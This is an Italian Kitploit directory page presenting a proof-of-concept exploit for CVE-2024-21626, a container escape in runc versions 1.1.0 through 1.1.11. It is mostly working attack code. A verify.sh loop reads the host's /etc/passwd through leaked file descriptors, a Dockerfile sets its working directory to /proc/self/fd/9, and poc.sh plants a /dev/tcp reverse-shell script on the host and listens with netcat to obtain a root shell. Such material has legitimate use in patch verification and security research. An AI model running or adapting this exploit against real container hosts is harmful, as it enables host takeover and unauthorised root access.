Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-21626 — POC | Kitploit
Strumenti/GitHubGitHub/kubernetesbachelor/cve-2024-21626
Escalation di PrivilegiSicurezza dei ContenitoriAnalisi delle VulnerabilitàExploitRed TeamingEscape dal Container
GitHubkubernetesbachelor/cve-2024-21626

CVE-2024-21626

POC

Vedi Repository
251 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-21626

POC

Requisiti

runc 1.1.0 <= 1.1.11

Installazione dell'ambiente vulnerabile

Distribuire una VM con Ubuntu 20.04 e scaricare Docker seguendo la loro guida

root@kitploit:~
https://docs.docker.com/engine/install/ubuntu/

Sostituire la versione 'runc' patchata in Docker con una vulnerabile

Scaricare una versione vulnerabile (runc 1.1.11 o precedente) dal repository GitHub di runc: https://github.com/opencontainers/runc/releases
Scegliere runc.amd64 (requisito) runc_1111

Esecuzione dell'exploit

Eseguire lo script 'verify.sh'

root@kitploit:~
#! /bin/bash
for i in {4..20}; do
	docker run -it --rm -w /proc/self/fd/$i ubuntu:20.04 bash -c "cat
/proc/self/cwd/../../../etc/passwd"
done

verify

Cambiare la directory di lavoro nel Dockerfile al fd corretto trovato eseguendo verify.sh

root@kitploit:~
FROM ubuntu:20.04
RUN apt-get update -y && apt-get install netcat -y
ADD ./poc.sh /poc.sh
WORKDIR /proc/self/fd/9

Costruire un container

root@kitploit:~
docker build . -t name_of_container

poc.sh

root@kitploit:~
#!/bin/bash
ip=$(hostname -I | awk '{print $1}')
port=1337
cat > /proc/self/cwd/../../../bin/bash.copy << EOF
#!/bin/bash
bash -i >& /dev/tcp/$ip/$port 0>&1
EOF

# listen and wait for reverse shell
nc -lvvp 1337

Eseguire l'immagine del container e avviare poc.sh in una shell bash

root@kitploit:~
docker run -it --rm cve2024 bash /poc.sh

Il container entra in modalità di ascolto

lytte

Un nuovo script chiamato 'bash.copy' è stato creato nella root della macchina host nella directory /proc/self/cwd/../../../bin/

bash

Rendendo eseguibile lo script ed eseguendolo...

root@kitploit:~
chmod +x bash.copy
./bash.copy

... otterrete una reverse shell con privilegi di root sulla macchina host

root

Fonte

https://ethicalhacking.uk/cracking-containers-understanding-cve-2024-21626-in-runc/#gsc.tab=0

Scarica lo strumento